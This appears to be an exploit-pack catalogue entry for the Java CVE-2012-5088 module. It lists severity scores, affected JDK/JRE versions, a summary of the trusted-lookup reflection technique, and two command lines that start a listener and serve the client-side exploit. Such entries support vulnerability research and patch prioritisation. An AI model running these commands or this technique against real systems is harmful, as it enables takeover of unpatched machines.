CVSS2: 10 High (AV:N/AC:L/Au:N/C:C/I:C/A:C)

- Access Vector: NETWORK
- Access Complexity: LOW
- Authentication: NONE
- Confidentiality Impact: COMPLETE
- Integrity Impact: COMPLETE
- Availability Impact: COMPLETE

EPSS: 0.927 High (percentile 98.8%)
| Name | java_CVE_2012_5088 |
|---|---|
| CVE | CVE-2012-5088 Exploit Pack |
| Vendor | Sun |

Notes:

The exploitation technique abuses the bug patched in CVE-2012-5088, which allows reflection to be used with full privileges. This works because we obtain an instance of java.lang.invoke.MethodHandles.Lookup by calling the static method java.lang.invoke.MethodHandles.lookup() from the AverageRangeStatisticImpl class, which is part of the JDK, so the lookup object has a "trusted" immediate caller, giving us full privileges. We then use the AnonymousClassLoader technique to fully exploit the target.
Affected versions: JDK and JRE 7 Update 7 and earlier
Tested on:
- Windows 7 with JDK/JRE 7 update 7
- Ubuntu 11.10 with JDK/JRE 7 update 7
- Ubuntu 11.10 with JDK/JRE 7 update 6
To run from the command line, first start the listener (UNIVERSAL):

```
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
```

Then run the exploit from clientd:

```
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_CVE_2012_5088 -O allowed_recon_modules:js_recon -O auto_detect_exploits:0
```
Repeatability: Infinite (client side - no crash)
References:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5088
- https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5088
- http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html
Date public: 16/10/2012